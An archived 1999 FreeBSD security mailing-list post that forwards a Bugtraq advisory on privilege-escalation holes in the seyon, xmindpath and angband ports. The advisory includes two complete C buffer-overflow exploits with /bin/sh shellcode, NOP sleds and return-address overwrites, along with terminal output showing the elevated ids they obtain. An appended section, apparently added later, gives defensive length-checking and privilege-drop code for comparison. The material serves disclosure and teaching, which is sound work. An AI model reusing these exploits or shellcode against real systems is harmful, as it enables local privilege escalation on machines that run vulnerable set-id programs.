From owner-freebsd-security  Wed Dec  1 09:33:13 1999
Delivered-To: freebsd-security@freebsd.org
Received: from magnesium.net (toxic.magnesium.net [207.154.84.15])
    by hub.freebsd.org (Postfix) with SMTP id DAA8015214
    for ; Wed, 1 Dec 1999 09:32:57 -0800 (PST)
    (envelope-from unfurl@magnesium.net)
Received: (qmail 72081 invoked by uid 1001); 1 Dec 1999 17:32:42 -0000
Date: 1 Dec 1999 09:32:42 -0800
Date: Wed, 1 Dec 1999 09:32:42 -0800
From: Bill Swingle
To: security@freebsd.org
Cc: Jordan Hubbard
Subject: [btellier@USA.NET: Several FreeBSD-3.3 vulnerabilities]
Message-ID: <19991201093242.A71817@dub.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre3i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ok, so I know these are all vulnerabilities in third party software, and
that the actual problem with each program is not really ours to fix, but
each of these problems can be avoided with small changes to the
respective ports.

FreeBSD vulnerabilities are few and far between, and even fewer are
published on Bugtraq. Having something as simple as this get past us is
really embarrassing. It says to the security community at large that
we're not even concerned enough with security to fix these small holes.
We all know that's not true.

I'm not sure who dropped the ball here, and I'm not pointing fingers. I
just hope that we can pull together in the future to avoid more of this.

(just my .04)

-Bill

----- Forwarded message from Brock Tellier -----

X-Mailer: USANET web-mailer (M3.4.0.33)
Date: Tue, 30 Nov 1999 16:08:29 MST
Reply-To: Brock Tellier
From: Brock Tellier
Subject: Several FreeBSD-3.3 vulnerabilities
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

RANT

I've given the FreeBSD team about a month to get something official
together. Maintainers were supposedly contacted, but no progress has been
made. As promised, here are the goods:

OVERVIEW

Vulnerabilities in seyon, xmindpath and angband can be used to upgrade
privileges.

BACKGROUND

All of the vulnerabilities discussed herein are based on my work on
FreeBSD 3.3-RELEASE. Each of the programs was installed with the default
permissions given when unpacked with sysinstall. These permissions are:

-rwxr-sr-x  1 bin   dialer   88480 Sep 11 00:55 /usr/X11R6/bin/seyon
-rwsr-xr-x  1 uucp  bin       7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
-r-xr-sr-x  1 bin   games   481794 Sep 11 01:10 /usr/X11R6/bin/angband

These programs may be installed on other systems with different
permissions as a result of a version change or a different packing
scheme.

DETAILS

Vuln #1 - The Seyon Mess

To summarize: Seyon was supposedly not meant to run with additional
privileges. There are numerous problems with seyon and I've probably not
found all of them. They are:

Buffer Overflows:
1. $HOME
2. seyon -emulator $BUF
3. seyon -modems $BUF
4. many long text box input string overflows while in program

Input Validation:
1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with
   full privs (as noted in previous advisory)
2. seyon -emulator /program/to/execute/with/full/privs

These privileges might be upgradable to root if you are able to
a. trojan a dialer-writable file, or
b. use a symlink attack to clobber .rhosts or similar, or
c. snoop device i/o.

Vuln #2 - xmindpath

/usr/X11R6/bin/xmindpath (suid uucp by default) contains a buffer
overflow which will allow any user to gain uucp privs. Simply enough:

xmindpath -f $BUF

See my "faxalter" advisory for more info on gaining root w/ euid uucp.

Vuln #3 - fun and egid games

Want to impress your friends with the highest tetris score known to man?
Gain egid games with a buffer overflow in /usr/X11R6/bin/angband. The
overflows are:

angband -u$BUF
angband -d$BUF

EXPLOITS

Seyon:

I've not written buffer overflow exploits for Seyon since an
equivalent-yield program execution vulnerability exists, but it is
certainly possible. The latter exploit is:

seyon -emulator /program/to/execute

Note that you'll have to execute a program that will ignore the args
that seyon passes to it automatically, as shown:

bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

xmindpath:

bash-2.03$ ls -la `which xmindpath`; id
-rwsr-xr-x  1 uucp  bin  7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
bash-2.03$ ./xmindx
FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
Brock Tellier btellier@usa.net
Using addr: 0xbfbfcfa8
bash-2.03$ xmindpath -f $RET
lock open: File name too long
$ id
uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
$

/*
 * FreeBSD 3.3 xmindpath exploit, gives euid uucp
 * Compile: gcc -o xmindx xmindx.c
 * Usage:   ./xmindx [offset]; then in the spawned shell:
 *          /path/to/xmindpath -f $RET
 * Brock Tellier
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

#define EGGLEN 2048   /* NOP sled + shellcode, exported as $EGG */
#define RETLEN 279    /* repeated return address, exported as $RET */
#define ALIGN  3      /* byte offset so the addresses line up on the stack */
#define NOP    0x90

int main(int argc, char *argv[])
{
    long int offset = 0;
    int i;
    int egglen = EGGLEN;
    int retlen = RETLEN;
    long int addr = 0xbfbfcfa8;   /* guessed stack address of the sled */
    char egg[EGGLEN + 1];         /* +1: room for the terminating NUL */
    char ret[RETLEN + 1];

    if (argc == 2)
        offset = atoi(argv[1]);
    addr = addr + offset;

    fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n");
    fprintf(stderr, "Using addr: 0x%lx\n", addr);

    /* EGG=<NOPs...><shellcode>: the sled lives in the environment */
    memset(egg, NOP, egglen);
    memcpy(egg + (egglen - strlen(shell) - 1), shell, strlen(shell));
    egg[egglen] = '\0';

    /* RET=<addr><addr>...: the overlong -f argument that overwrites EIP */
    for (i = ALIGN; i < retlen; i += 4)
        *(int *)&ret[i] = addr;
    ret[retlen] = '\0';

    memcpy(egg, "EGG=", 4);
    putenv(egg);
    memcpy(ret, "RET=", 4);
    putenv(ret);

    system("/usr/local/bin/bash");
    return 0;
}

angband:

bash-2.03$ gcc -o angames angames.c
bash-2.03$ angband `./angames`
eip=0xbfbfc6b4 offset=0 buflen=1095
NOPs to 1021
Shellcode to 1088
eip to 1092
garbage to 1094
$ id
uid=1000(xnec) gid=1000(xnec) egid=13(games) groups=13(games), 1000(xnec)
$

/* FreeBSD 3.3 angband exploit, yields egid of group games
 * usage: gcc -o angames angames.c
 *        /path/to/angband `./angames [offset]`
 * overflow is 1088 bytes of NOP/Shellcode + 4 bytes EIP + 2 bytes garbage
 * Brock Tellier
 */

#include <stdio.h>
#include <stdlib.h>

char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
    int x = 0;
    int y = 0;
    int offset = 0;
    int bsize = 1095;             /* 2 bytes "-u" + overflowed buf's bytes + */
    char buf[bsize];              /* 4 bytes EBP + 4 bytes EIP + 2 bytes garbage */
    char arg[bsize + 2];
    unsigned int eip = 0xbfbfc6b4;   /* FreeBSD 3.3 */

    if (argv[1]) {
        offset = atoi(argv[1]);
        eip = eip + offset;
    }
    fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

    /* NOP sled */
    for (x = 0; x < 1021; x++)
        buf[x] = 0x90;
    fprintf(stderr, "NOPs to %d\n", x);

    /* 67 bytes of shellcode */
    for (y = 0; y < 67; x++, y++)
        buf[x] = shell[y];
    fprintf(stderr, "Shellcode to %d\n", x);

    /* little-endian return address over the saved EIP */
    buf[x++] = eip & 0x000000ff;
    buf[x++] = (eip & 0x0000ff00) >> 8;
    buf[x++] = (eip & 0x00ff0000) >> 16;
    buf[x++] = (eip & 0xff000000) >> 24;
    fprintf(stderr, "eip to %d\n", x);

    buf[x++] = 'X';
    buf[x++] = 'X';
    fprintf(stderr, "garbage to %d\n", x);

    buf[bsize - 1] = '\0';
    sprintf(arg, "-u%s", buf);   /* the whole payload goes in as the -u argument */
    arg[bsize + 1] = '\0';
    printf("%s", arg);
    return 0;
}

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA

----- End forwarded message -----

-- 
-=| --- B i l l   S w i n g l e --- http://www.dub.net/
-=| unfurl@dub.net - unfurl@freebsd.org - bill@cdrom.com
-=| Different all twisty a of in maze are you, passages little
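The three bugs in the forwarded advisory share two defect classes: a set-id binary copying data it does not control (argv, $HOME) into a fixed stack buffer without a length check, and a set-gid binary exec'ing a program the user names (seyon -emulator) or that $PATH resolves ("xterm", "seyon-emu") while still holding the dialer privilege. The C program below is an added example written for this page, not code from the advisory or from seyon, xmindpath or angband; the function names, NAME_LEN and the 64-byte buffer are hypothetical. It puts the vulnerable strcpy() pattern beside a length-checked copy that rejects the 279-byte $RET and 1095-byte -u arguments the exploits above build, and shows a privilege drop that is verified before any exec of a user-chosen program.

```c
/* Added example (not from the advisory or the affected ports): unchecked
 * vs. length-checked argument handling, and a verified privilege drop,
 * for a set-gid program. All names here are hypothetical. */
#define _DEFAULT_SOURCE 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define NAME_LEN 64   /* hypothetical fixed buffer, like the ones overflowed above */

/* Vulnerable pattern, shown for contrast and never called here: a fixed
 * stack buffer filled by strcpy() from an attacker-controlled argument.
 * A 1095-byte "-u" string overwrites the saved return address, which is
 * exactly what angames.c relies on. */
void vulnerable_set_name(const char *arg)
{
    char name[NAME_LEN];
    strcpy(name, arg);            /* no length check: stack smash */
    printf("name: %s\n", name);
}

/* Hardened: refuse an argument that does not fit instead of copying it
 * (or silently truncating it). Returns 0 on success, -1 if too long. */
int checked_set_name(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;                /* no room for the terminating NUL */
    memcpy(dst, arg, n + 1);
    return 0;
}

/* Constructs a len-byte argument of 'A's (the advisory's $BUF) and reports
 * whether checked_set_name() accepts it into a NAME_LEN buffer. */
int reject_oversized(size_t len)
{
    char name[NAME_LEN];
    char *arg = malloc(len + 1);
    int rc;

    if (arg == NULL)
        return -2;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = checked_set_name(name, sizeof name, arg);
    free(arg);
    return rc;
}

/* Before exec'ing anything the user names (seyon -emulator) or anything
 * looked up via $PATH ("xterm"), give up the set-id privilege and verify
 * it is gone. setregid()/setreuid() with both ids equal to the real id
 * also replace the saved id on FreeBSD and Linux, so the privilege cannot
 * be recovered after the exec. Groups are dropped first, since a process
 * that has already dropped uid may no longer be allowed to change gids.
 * Returns 1 if the effective ids now equal the real ids, else 0. */
int drop_privs(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setregid(rgid, rgid) != 0 || setreuid(ruid, ruid) != 0)
        return 0;
    return getegid() == rgid && geteuid() == ruid;   /* check, never assume */
}

int main(int argc, char *argv[])
{
    char name[NAME_LEN];
    const char *emulator = argc > 1 ? argv[1] : "xterm";

    if (checked_set_name(name, sizeof name, emulator) != 0) {
        fprintf(stderr, "argument too long (max %d bytes), refusing\n",
                NAME_LEN - 1);
        return 1;
    }
    if (!drop_privs()) {
        fprintf(stderr, "could not drop privileges, refusing to exec\n");
        return 1;
    }
    /* Only now would an execvp() of `name` be safe: it runs as the caller. */
    printf("would exec %s as uid %d gid %d\n", name,
           (int)geteuid(), (int)getegid());
    return 0;
}
```

Run it as `./a.out "$(printf 'A%.0s' $(seq 1095))"` to see the angband-sized argument refused before it reaches any buffer. To find other set-id ports on a 3.3 box worth the same review, `find /usr/X11R6/bin /usr/local/bin \( -perm -4000 -o -perm -2000 \) -type f -ls` lists the candidates; the three in the advisory appear in that output with the permissions quoted above.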